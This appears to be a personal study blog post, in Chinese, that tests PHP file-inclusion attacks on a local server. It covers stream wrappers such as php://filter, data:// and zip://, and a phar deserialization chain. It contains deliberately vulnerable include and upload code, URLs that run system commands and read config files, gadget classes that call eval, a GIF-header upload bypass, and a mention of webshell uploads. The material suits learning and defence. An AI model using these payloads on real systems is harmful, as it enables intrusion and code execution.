以下都在本地测试运行
在测试之前,先修改一下php.ini里面的配置文件
1.(input输出流)
index.php文件内容为
<?php include($_GET["file"]); ?>
php://input 是个可以访问请求的原始数据的只读流,关于php://input
https://www.cnblogs.com/redfire/p/7695263.html
2. (filter协议)
127.0.0.1/index.php?file=php://filter/read=convert.base64-encode/resource=D:\phpstudy_pro\Extensions\php\php7.3.4nts\php.ini
读取指定文件,以base64编码格式输出,这里我读取的是php.ini,注意这里要用绝对路径,一些ctf当中有此类应用
关于php://filter协议的应用
https://blog.csdn.net/destiny1507/article/details/82347371
3.(zip协议)
127.0.0.1/index.php?file=zip://1.zip%23in.php
<?php
$file = $_GET['file']; /*index.php*/
include($file) ;
?>
<?php
phpinfo(); /*in.php*/
?>
zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]
但是大多数情况下,会对php文件有过滤的,接下来我们把php文件改为jpg
127.0.0.1/index.php?file=zip://in.zip%23in.jpg
发现同样能执行成功,仔细想一下,这里主要还是include函数的作用
(再仔细想一下,与我目前的知识水平,感觉这个方法很鸡肋,既然能直接包含了,何必再大费周章的压缩文件呢,当然,很多东西自己可能都不是很了解,肯定有它存在的用处的,先积累)
4. (data协议)
127.0.0.1/index.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
PD9waHAgcGhwaW5mbygpOyA/Pg== 是 <?php phpinfo(); ?>的编码
127.0.0.1/index.php?file=data:text/plain,<?php system('whoami')?>
也可以用做命令执行
127.0.0.1/index.php?file=data:text/plain,<?php system('type D:\phpstudy_pro\Extensions\php\php7.3.4nts\php.ini')?>
也可以读取源码
5.(file协议)
127.0.0.1/index.php?file=file://D:\phpstudy_pro\www\test.php
file协议用来访问本地文件(这里我一开始读的是php的配置文件,不知道咋回事总是报错)
6.(phar协议)
我现在本地测试一下利用phar协议的流程
<!-- phar.php -->
<?php
require_once('eval.class.php');
$exception = new Evil('phpinfo()');
$phar = new Phar("vu.phar");
$phar->startBuffering();
$phar->addFromString("test.txt", "test");
$phar->setStub("<?php__HALT_COMPILER(); ?>");
$phar->setMetadata($exception);
$phar->stopBuffering();
?>
<!-- eval.class.php -->
<?php
class Evil {
protected $val;
function __construct($val)
{
$this->val = $val;
}
function __wakeup() {
assert($this->val);
}
}
?>
以上两段代码用来生成一个vu.phar文件,我们把phar.php放在网页里访问一下
注意后面对我们传输的值进行了序列化处理
phar协议实质上就是对序列化与反序列化的应用
接下来正式开始测试,在本地搭一个文件上传的环境
<!-- upload_file.html -->
<body>
<form action="http://localhost/upload_file.php" method="post" enctype="multipart/form-data">
<input type="file" name="file" />
<input type="submit" name="Upload" />
</form>
</body>
<!-- upload_file.php -->
<?php
if (($_FILES["file"]["type"]=="image/gif")&&(substr($_FILES["file"]["name"], strrpos($_FILES["file"]["name"], '.')+1))== 'gif') {
echo "Upload: " . $_FILES["file"]["name"];
echo "Type: " . $_FILES["file"]["type"];
echo "Temp file: " . $_FILES["file"]["tmp_name"];
if (file_exists("upload_file/" . $_FILES["file"]["name"]))
{
echo $_FILES["file"]["name"] . " already exists. ";
}
else
{
move_uploaded_file($_FILES["file"]["tmp_name"],
"upload_file/" .$_FILES["file"]["name"]);
echo "Stored in: " . "upload_file/" . $_FILES["file"]["name"];
}
}
else
{
echo "Invalid file,you can only upload gif";
}
?>
<!-- file_un.php -->
<?php
$filename=$_GET['filename'];
class AnyClass{
var $output = 'echo "ok";';
function __destruct()
{
eval($this -> output);
}}
file_exists($filename);
?>
这里文件上传规定只允许上传文件后缀为gif的文件,且检查了文件头是否正确,我们要做的是把phar文件上传,但是这里是不能成功的,因为生成的phar文件并没有添加gif头,所以这里在直接生成一个含有gif头的phar文件
<!-- eval.php -->
<?php
class AnyClass{
var $output = 'echo "ok";';
function __destruct()
{
eval($this -> output);
}
}
$phar = new Phar('1.phar');
$phar -> stopBuffering();
$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
$phar -> addFromString('test.txt','test');
$object = new AnyClass();
$object -> output= 'phpinfo();';
$phar -> setMetadata($object);
$phar -> stopBuffering();
?>
我们在把新生成的1.phar修改后缀为1.gif,上传到服务器
这里不知道为什么,一上传就提示404,一开始考虑可能是目录权限的问题,但是改权限也没有用,如果把所有上传文件放到www目录下,就能上传成功,这里就先在www目录下进行上传
下面用phar协议进行包含,注意这里一定要有一个文件包含的地方,刚才的file_un.php就提供了这个函数
http://localhost/file_un.php?filename=phar://1.gif
成功执行phpinfo
刚才上面也说过,phar协议和php序列化有关系,用简单的话来概括一下流程
生成phar文件(文件包含phpinfo,并将它序列化,生成文件的过程本质就是序列化的过程) => phar:// 访问文件(phar://就相当于反序列化的过程) => 利用文件包含传参 file=phar://1.gif
在生成phar文件的过程中,可以对phar文件添加任意图片头,再通过修改后缀这也是防护的很好方式,但是这只是过滤了文件头检测和文件后缀检测,防护并不是很彻底
其他测试
http://localhost/index.php?file=phar://1.jpg/in.php
这里可以直接利用phar协议,这个方法和zip协议还是很类似的,把#换成/就好了(原理不太清楚,先用着)
写到这里又发现,为啥还要大费周折的创建一个phar然后在反序列化呢,直接上传一个gif不就好了吗,本质都是文件包含,为啥还要伪协议呢,直接file=1.gif不就好了,emmmm,就当积累知识了
利用php协议上传一句话木马
http://localhost/index.php?file=zip://shell.zip%23shell.php
将shell.php打包为shell.zip(.zip也可改成.jpg)
利用php://input上传一句话木马
执行完后可以看到直接生成了1.php
关于各个协议的php.ini配置
文章参考
https://www.freebuf.com/company-information/187071.html
https://xz.aliyun.com/t/2715
https://www.cnblogs.com/ichunqiu/p/10683379.html
https://www.jianshu.com/p/237804b9f19b
自己以前遇到过的php序列化的ctf,可以参考一下我以前的文章
https://blog.csdn.net/weixin_43940853/article/details/95324289
